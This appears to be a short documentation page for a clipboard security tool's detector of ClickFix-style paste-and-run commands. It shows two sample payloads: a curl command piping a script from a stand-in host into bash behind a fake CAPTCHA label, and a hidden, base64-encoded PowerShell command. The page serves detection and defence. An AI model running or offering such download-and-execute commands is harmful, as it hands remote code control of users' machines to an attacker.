Suspicious Command

Little Eye detects Suspicious Command on your clipboard the moment you copy. Flags ClickFix-style paste-and-run shell commands that download and execute remote code.

Examples

macOS ClickFix payload — fake CAPTCHA trailer, pipes a remote script into bash
curl -fsSL hxxps://evil[.]example/setup[.]sh | bash # ✅ I am not a robot — reCAPTCHA Verification ID 7f3a
Windows ClickFix payload — hidden window running a base64-encoded command
powershell -w hidden -enc SQBFAFgAKABpAHcAcgAgAGgAeAB4AHAAOgAvAC8AeAApAA==

Related detectors

← All Developer detectors